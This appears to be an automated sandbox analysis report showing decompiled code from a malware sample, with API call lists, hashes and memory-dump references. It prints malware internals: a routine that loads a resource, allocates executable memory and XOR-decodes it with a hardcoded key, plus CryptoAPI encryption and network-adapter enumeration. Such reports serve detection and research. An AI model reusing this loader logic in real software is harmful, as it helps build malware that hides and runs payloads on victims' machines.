                                                                                                                                                                                                                                                                                                        							CryptAcquireContextA( &_v12, _t47, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                                        						_v20 = 0;
                                                                                                                                                                                                                                                                                                        						if(CryptImportKey(_v12, _a12, _a16, 0, 1,  &_v20) != 0) {
                                                                                                                                                                                                                                                                                                        							_t33 = _v20;
                                                                                                                                                                                                                                                                                                        							__imp__CryptEncrypt(_t33, 0, 1, 0, _a4, _a8,  *_a8); // executed
                                                                                                                                                                                                                                                                                                        							_v8 = _t33;
                                                                                                                                                                                                                                                                                                        							CryptDestroyKey(_v20);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						CryptReleaseContext(_v12, 0); // executed
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}











                                                                                                                                                                                                                                                                                                        0x04008976
                                                                                                                                                                                                                                                                                                        0x04008981
                                                                                                                                                                                                                                                                                                        0x04008a60
                                                                                                                                                                                                                                                                                                        0x04008a66
                                                                                                                                                                                                                                                                                                        0x040089a5
                                                                                                                                                                                                                                                                                                        0x040089a5
                                                                                                                                                                                                                                                                                                        0x040089b5
                                                                                                                                                                                                                                                                                                        0x040089bf
                                                                                                                                                                                                                                                                                                        0x040089c7
                                                                                                                                                                                                                                                                                                        0x040089cf
                                                                                                                                                                                                                                                                                                        0x040089d9
                                                                                                                                                                                                                                                                                                        0x040089ed
                                                                                                                                                                                                                                                                                                        0x040089f8
                                                                                                                                                                                                                                                                                                        0x040089f8
                                                                                                                                                                                                                                                                                                        0x040089d9
                                                                                                                                                                                                                                                                                                        0x04008a02
                                                                                                                                                                                                                                                                                                        0x04008a04
                                                                                                                                                                                                                                                                                                        0x04008a27
                                                                                                                                                                                                                                                                                                        0x04008a3d
                                                                                                                                                                                                                                                                                                        0x04008a41
                                                                                                                                                                                                                                                                                                        0x04008a47
                                                                                                                                                                                                                                                                                                        0x04008a4e
                                                                                                                                                                                                                                                                                                        0x04008a4e
                                                                                                                                                                                                                                                                                                        0x04008a5a
                                                                                                                                                                                                                                                                                                        0x04008a5a
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x04008a02

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 040089BF
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 040089C9
                                                                                                                                                                                                                                                                                                        • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 040089F8
                                                                                                                                                                                                                                                                                                        • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 04008A1F
                                                                                                                                                                                                                                                                                                        • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 04008A41
                                                                                                                                                                                                                                                                                                        • CryptDestroyKey.ADVAPI32(00000000), ref: 04008A4E
                                                                                                                                                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008A5A
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 040089B0
                                                                                                                                                                                                                                                                                                        • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 040089E8
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Crypt$Context$Acquire$DestroyEncryptErrorImportLastRelease
                                                                                                                                                                                                                                                                                                        • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                                                        • API String ID: 3736710109-947817771
                                                                                                                                                                                                                                                                                                        • Opcode ID: a580c414a6f780aecf9ca1925e7721a486cca4ea517db96ead6d5debf2f75543
                                                                                                                                                                                                                                                                                                        • Instruction ID: 073036156a227ab269f6199982c6e62e9abf2561c3e32999b52b046b74d0c6c6
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a580c414a6f780aecf9ca1925e7721a486cca4ea517db96ead6d5debf2f75543
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D231FD75A40208EFFB54DFA4C849BAE77B9FB44701F14C658F605B62C0D7B8AA80CB51
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 16%
                                                                                                                                                                                                                                                                                                        			E00401EBB(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                                                                                                                                        				signed int _v32;
                                                                                                                                                                                                                                                                                                        				char* _v36;
                                                                                                                                                                                                                                                                                                        				signed int _v40;
                                                                                                                                                                                                                                                                                                        				signed int _v44;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                                                                                                                                                        				char _v52;
                                                                                                                                                                                                                                                                                                        				char _v56;
                                                                                                                                                                                                                                                                                                        				char _v60;
                                                                                                                                                                                                                                                                                                        				char _v64;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v408;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v412;
                                                                                                                                                                                                                                                                                                        				char _v416;
                                                                                                                                                                                                                                                                                                        				char _v448;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v452;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v456;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v476;
                                                                                                                                                                                                                                                                                                        				char _v480;
                                                                                                                                                                                                                                                                                                        				char* _v496;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v500;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v504;
                                                                                                                                                                                                                                                                                                        				char* _v512;
                                                                                                                                                                                                                                                                                                        				char* _v516;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v520;
                                                                                                                                                                                                                                                                                                        				char _v524;
                                                                                                                                                                                                                                                                                                        				char* _v528;
                                                                                                                                                                                                                                                                                                        				signed int _v532;
                                                                                                                                                                                                                                                                                                        				char* _v536;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t60;
                                                                                                                                                                                                                                                                                                        				char* _t66;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t67;
                                                                                                                                                                                                                                                                                                        				signed int _t95;
                                                                                                                                                                                                                                                                                                        				signed int _t105;
                                                                                                                                                                                                                                                                                                        				void* _t110;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t111;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t113;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t114;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t94 = __ecx;
                                                                                                                                                                                                                                                                                                        				_t111 = _t110 - 0x1ec;
                                                                                                                                                                                                                                                                                                        				_v456 = E00418AA0;
                                                                                                                                                                                                                                                                                                        				_v452 = 0x419106;
                                                                                                                                                                                                                                                                                                        				_t60 =  &_v448;
                                                                                                                                                                                                                                                                                                        				 *_t60 =  &_v28;
                                                                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t60 + 4)) = E00402044;
                                                                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t60 + 8)) = _t111;
                                                                                                                                                                                                                                                                                                        				 *_t111 =  &_v480;
                                                                                                                                                                                                                                                                                                        				E0040E1A0(__ecx, E00402044);
                                                                                                                                                                                                                                                                                                        				_v52 = 0;
                                                                                                                                                                                                                                                                                                        				_v36 = "s4qYr%myN9I#LzO$Zl35Lk@w#T(T6#^hn^vZ";
                                                                                                                                                                                                                                                                                                        				_v40 = 0;
                                                                                                                                                                                                                                                                                                        				_v44 = 0;
                                                                                                                                                                                                                                                                                                        				_v60 = 0;
                                                                                                                                                                                                                                                                                                        				_v64 = 0;
                                                                                                                                                                                                                                                                                                        				_v416 = L"OMT";
                                                                                                                                                                                                                                                                                                        				_v412 = _a4;
                                                                                                                                                                                                                                                                                                        				_v408 = 0x409;
                                                                                                                                                                                                                                                                                                        				_v496 =  &_v56;
                                                                                                                                                                                                                                                                                                        				_v500 = 3;
                                                                                                                                                                                                                                                                                                        				_t66 =  &_v416;
                                                                                                                                                                                                                                                                                                        				_v504 = _t66;
                                                                                                                                                                                                                                                                                                        				 *_t111 = 0x400000;
                                                                                                                                                                                                                                                                                                        				_v476 = 1;
                                                                                                                                                                                                                                                                                                        				L00404F64();
                                                                                                                                                                                                                                                                                                        				_v48 = _t66;
                                                                                                                                                                                                                                                                                                        				_t67 = _v56;
                                                                                                                                                                                                                                                                                                        				_v512 =  &_v64;
                                                                                                                                                                                                                                                                                                        				_v516 =  &_v60;
                                                                                                                                                                                                                                                                                                        				_v520 = _t67;
                                                                                                                                                                                                                                                                                                        				_v524 = 0x400000;
                                                                                                                                                                                                                                                                                                        				L00404F6C();
                                                                                                                                                                                                                                                                                                        				_t113 = _t111;
                                                                                                                                                                                                                                                                                                        				_v48 = _t67;
                                                                                                                                                                                                                                                                                                        				_v520 = 0x40;
                                                                                                                                                                                                                                                                                                        				_v524 = 0x3000;
                                                                                                                                                                                                                                                                                                        				_v528 =  &_v64;
                                                                                                                                                                                                                                                                                                        				_v532 = 0;
                                                                                                                                                                                                                                                                                                        				_v536 =  &_v52;
                                                                                                                                                                                                                                                                                                        				 *_t113 = 0xffffffff; // executed
                                                                                                                                                                                                                                                                                                        				NtAllocateVirtualMemory(??, ??, ??, ??, ??, ??); // executed
                                                                                                                                                                                                                                                                                                        				_t114 = _t113 - 0x18;
                                                                                                                                                                                                                                                                                                        				_v32 = 0;
                                                                                                                                                                                                                                                                                                        				while(_v32 < _v64) {
                                                                                                                                                                                                                                                                                                        					_t95 = _v32;
                                                                                                                                                                                                                                                                                                        					_t105 = ((_t95 * 0xdd67c8a7 >> 0x20) + _t95 >> 5) - (_t95 >> 0x1f);
                                                                                                                                                                                                                                                                                                        					_t94 = _t95 - ((_t105 << 3) + _t105 << 2) + _t105;
                                                                                                                                                                                                                                                                                                        					 *((char*)(_v52 + _v32)) = _v36[_t95 - ((_t105 << 3) + _t105 << 2) + _t105] & 0x000000ff ^  *(_v32 + _v60) & 0x000000ff;
                                                                                                                                                                                                                                                                                                        					_v32 = _v32 + 1;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				_t107 = _v52;
                                                                                                                                                                                                                                                                                                        				 *_a8 = _v52;
                                                                                                                                                                                                                                                                                                        				 *_t114 =  &_v480;
                                                                                                                                                                                                                                                                                                        				return E0040E320(_t94, _t107);
                                                                                                                                                                                                                                                                                                        			}









































                                                                                                                                                                                                                                                                                                        0x00401ebb
                                                                                                                                                                                                                                                                                                        0x00401ec1
                                                                                                                                                                                                                                                                                                        0x00401ec7
                                                                                                                                                                                                                                                                                                        0x00401ed1
                                                                                                                                                                                                                                                                                                        0x00401edb
                                                                                                                                                                                                                                                                                                        0x00401ee4
                                                                                                                                                                                                                                                                                                        0x00401eeb
                                                                                                                                                                                                                                                                                                        0x00401eee
                                                                                                                                                                                                                                                                                                        0x00401ef7
                                                                                                                                                                                                                                                                                                        0x00401efa
                                                                                                                                                                                                                                                                                                        0x00401eff
                                                                                                                                                                                                                                                                                                        0x00401f06
                                                                                                                                                                                                                                                                                                        0x00401f0d
                                                                                                                                                                                                                                                                                                        0x00401f14
                                                                                                                                                                                                                                                                                                        0x00401f1b
                                                                                                                                                                                                                                                                                                        0x00401f22
                                                                                                                                                                                                                                                                                                        0x00401f2e
                                                                                                                                                                                                                                                                                                        0x00401f37
                                                                                                                                                                                                                                                                                                        0x00401f3d
                                                                                                                                                                                                                                                                                                        0x00401f4a
                                                                                                                                                                                                                                                                                                        0x00401f4e
                                                                                                                                                                                                                                                                                                        0x00401f56
                                                                                                                                                                                                                                                                                                        0x00401f5c
                                                                                                                                                                                                                                                                                                        0x00401f60
                                                                                                                                                                                                                                                                                                        0x00401f67
                                                                                                                                                                                                                                                                                                        0x00401f71
                                                                                                                                                                                                                                                                                                        0x00401f79
                                                                                                                                                                                                                                                                                                        0x00401f7c
                                                                                                                                                                                                                                                                                                        0x00401f82
                                                                                                                                                                                                                                                                                                        0x00401f89
                                                                                                                                                                                                                                                                                                        0x00401f8d
                                                                                                                                                                                                                                                                                                        0x00401f91
                                                                                                                                                                                                                                                                                                        0x00401f98
                                                                                                                                                                                                                                                                                                        0x00401f9d
                                                                                                                                                                                                                                                                                                        0x00401fa0
                                                                                                                                                                                                                                                                                                        0x00401fa3
                                                                                                                                                                                                                                                                                                        0x00401fab
                                                                                                                                                                                                                                                                                                        0x00401fb6
                                                                                                                                                                                                                                                                                                        0x00401fba
                                                                                                                                                                                                                                                                                                        0x00401fc5
                                                                                                                                                                                                                                                                                                        0x00401fc9
                                                                                                                                                                                                                                                                                                        0x00401fd0
                                                                                                                                                                                                                                                                                                        0x00401fd5
                                                                                                                                                                                                                                                                                                        0x00401fd8
                                                                                                                                                                                                                                                                                                        0x00402030
                                                                                                                                                                                                                                                                                                        0x00401ff5
                                                                                                                                                                                                                                                                                                        0x0040200e
                                                                                                                                                                                                                                                                                                        0x0040201c
                                                                                                                                                                                                                                                                                                        0x0040202a
                                                                                                                                                                                                                                                                                                        0x0040202c
                                                                                                                                                                                                                                                                                                        0x0040202c
                                                                                                                                                                                                                                                                                                        0x0040203a
                                                                                                                                                                                                                                                                                                        0x00402040
                                                                                                                                                                                                                                                                                                        0x00402065
                                                                                                                                                                                                                                                                                                        0x00402074

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.630481096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630299651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.630613479.0000000000402000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631291929.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631468354.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631586633.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631856136.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.631956687.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.632480755.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AccessAllocateFindMemoryResourceResource_Virtual
                                                                                                                                                                                                                                                                                                        • String ID: @$OMT$s4qYr%myN9I#LzO$Zl35Lk@w#T(T6#^hn^vZ
                                                                                                                                                                                                                                                                                                        • API String ID: 2485490239-3843035961
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3ba9d8c3c3de79a090e3b742c6c1ed1d57ad730d95a193a03d7c314015c75e69
                                                                                                                                                                                                                                                                                                        • Instruction ID: ff8897463fb2fbedf42f4e80d1da6419d3676337a3971e8b30f16ddae3d354f8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ba9d8c3c3de79a090e3b742c6c1ed1d57ad730d95a193a03d7c314015c75e69
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE4106B09042199FCB00DF69C884BDEFBF4EB89304F10C56AE958A7341D7789A49CF95
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E040097A0(long _a4) {
                                                                                                                                                                                                                                                                                                        				void* _t4;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t4 = RtlAllocateHeap(GetProcessHeap(), 8, _a4); // executed
                                                                                                                                                                                                                                                                                                        				return _t4;
                                                                                                                                                                                                                                                                                                        			}




                                                                                                                                                                                                                                                                                                        0x040097b0
                                                                                                                                                                                                                                                                                                        0x040097b7

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,04009FB2,?,04009FB2,00000000,?,?,?,04009E2D), ref: 040097A9
                                                                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,04009FB2,00000000,?,?,?,04009E2D), ref: 040097B0
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1357844191-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: e19e0248bdcccd87c05d7a61fb539eafc2efb7858191fd7307808dd8c9195d95
                                                                                                                                                                                                                                                                                                        • Instruction ID: 51615621b5a1f832d01dc3b7a4cc229a82638b6a1205cca077e68d01418531cd
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e19e0248bdcccd87c05d7a61fb539eafc2efb7858191fd7307808dd8c9195d95
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93C09B71144308ABE6449FD8E80DD95375DE748601F004111B70DD6141CB7CAD84C762
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                                                                                                                                                        			E04009F70(intOrPtr _a4, signed int _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _v28;
                                                                                                                                                                                                                                                                                                        				void* _v32;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t59;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t64;
                                                                                                                                                                                                                                                                                                        				void* _t99;
                                                                                                                                                                                                                                                                                                        				void* _t100;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 1;
                                                                                                                                                                                                                                                                                                        				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                                        					_t103 = _a8 - 5;
                                                                                                                                                                                                                                                                                                        					if(_a8 > 5) {
                                                                                                                                                                                                                                                                                                        						asm("cdq");
                                                                                                                                                                                                                                                                                                        						_t59 = E040097A0( ~(0 | _t103 > 0x00000000) | _a8 / 0x00000006 * 0x00000288); // executed
                                                                                                                                                                                                                                                                                                        						_t100 = _t99 + 4;
                                                                                                                                                                                                                                                                                                        						_v28 = _t59;
                                                                                                                                                                                                                                                                                                        						_v12 = _v28;
                                                                                                                                                                                                                                                                                                        						if(_v12 != 0) {
                                                                                                                                                                                                                                                                                                        							_v16 = _v12;
                                                                                                                                                                                                                                                                                                        							_v20 = _a8 * 0x288 / 6;
                                                                                                                                                                                                                                                                                                        							_push( &_v20);
                                                                                                                                                                                                                                                                                                        							_t64 = _v12;
                                                                                                                                                                                                                                                                                                        							_push(_t64); // executed
                                                                                                                                                                                                                                                                                                        							L0400B1DA(); // executed
                                                                                                                                                                                                                                                                                                        							if(_t64 == 0) {
                                                                                                                                                                                                                                                                                                        								_v24 = 0;
                                                                                                                                                                                                                                                                                                        								while(_v12 != 0 && _v24 < _a8) {
                                                                                                                                                                                                                                                                                                        									if( *((intOrPtr*)(_v12 + 0x190)) < _a8 - _v24) {
                                                                                                                                                                                                                                                                                                        										E04007B70(_a4 + _v24, _v12 + 0x194,  *((intOrPtr*)(_v12 + 0x190)));
                                                                                                                                                                                                                                                                                                        										_t100 = _t100 + 0xc;
                                                                                                                                                                                                                                                                                                        										_v24 = _v24 +  *((intOrPtr*)(_v12 + 0x190));
                                                                                                                                                                                                                                                                                                        										_v12 =  *_v12;
                                                                                                                                                                                                                                                                                                        										_v8 = 1;
                                                                                                                                                                                                                                                                                                        										continue;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									break;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								 *_a12 = _v24;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							_v32 = _v16;
                                                                                                                                                                                                                                                                                                        							E040097C0(_v32);
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                                                                                                                                        			}














                                                                                                                                                                                                                                                                                                        0x04009f76
                                                                                                                                                                                                                                                                                                        0x04009f81
                                                                                                                                                                                                                                                                                                        0x04009f87
                                                                                                                                                                                                                                                                                                        0x04009f8b
                                                                                                                                                                                                                                                                                                        0x04009f94
                                                                                                                                                                                                                                                                                                        0x04009fad
                                                                                                                                                                                                                                                                                                        0x04009fb2
                                                                                                                                                                                                                                                                                                        0x04009fb5
                                                                                                                                                                                                                                                                                                        0x04009fbb
                                                                                                                                                                                                                                                                                                        0x04009fc2
                                                                                                                                                                                                                                                                                                        0x04009fcb
                                                                                                                                                                                                                                                                                                        0x04009fe0
                                                                                                                                                                                                                                                                                                        0x04009fe6
                                                                                                                                                                                                                                                                                                        0x04009fe7
                                                                                                                                                                                                                                                                                                        0x04009fea
                                                                                                                                                                                                                                                                                                        0x04009feb
                                                                                                                                                                                                                                                                                                        0x04009ff2
                                                                                                                                                                                                                                                                                                        0x04009ff4
                                                                                                                                                                                                                                                                                                        0x04009ffb
                                                                                                                                                                                                                                                                                                        0x0400a018
                                                                                                                                                                                                                                                                                                        0x0400a034
                                                                                                                                                                                                                                                                                                        0x0400a039
                                                                                                                                                                                                                                                                                                        0x0400a048
                                                                                                                                                                                                                                                                                                        0x0400a050
                                                                                                                                                                                                                                                                                                        0x0400a053
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0400a05e
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0400a018
                                                                                                                                                                                                                                                                                                        0x0400a066
                                                                                                                                                                                                                                                                                                        0x0400a066
                                                                                                                                                                                                                                                                                                        0x0400a06b
                                                                                                                                                                                                                                                                                                        0x0400a072
                                                                                                                                                                                                                                                                                                        0x0400a077
                                                                                                                                                                                                                                                                                                        0x04009fc2
                                                                                                                                                                                                                                                                                                        0x04009f8b
                                                                                                                                                                                                                                                                                                        0x0400a080

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 040097A0: GetProcessHeap.KERNEL32(00000008,04009FB2,?,04009FB2,00000000,?,?,?,04009E2D), ref: 040097A9
                                                                                                                                                                                                                                                                                                          • Part of subcall function 040097A0: RtlAllocateHeap.NTDLL(00000000,?,04009FB2,00000000,?,?,?,04009E2D), ref: 040097B0
                                                                                                                                                                                                                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,04009E2D), ref: 04009FEB
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.659687916.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.659598830.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660025736.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.660136612.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4000000_6gjnnBAbpc.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Heap$AdaptersAllocateInfoProcess
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1318000056-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 73ff96f27f52de9840d8f092c1af349ff5175d9842f98ddb7f52f1a4bac05a00
                                                                                                                                                                                                                                                                                                        • Instruction ID: 97f005e152f21f2c2f7fd10924b0caa403664ba6d1ad8a9a516f1bf18f754b30
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 73ff96f27f52de9840d8f092c1af349ff5175d9842f98ddb7f52f1a4bac05a00
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B931FBB5E00209EFEB04CF98C494AEEB7B5EF48308F10C169E909A7390D735AA45CF51
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                        • Not Executed
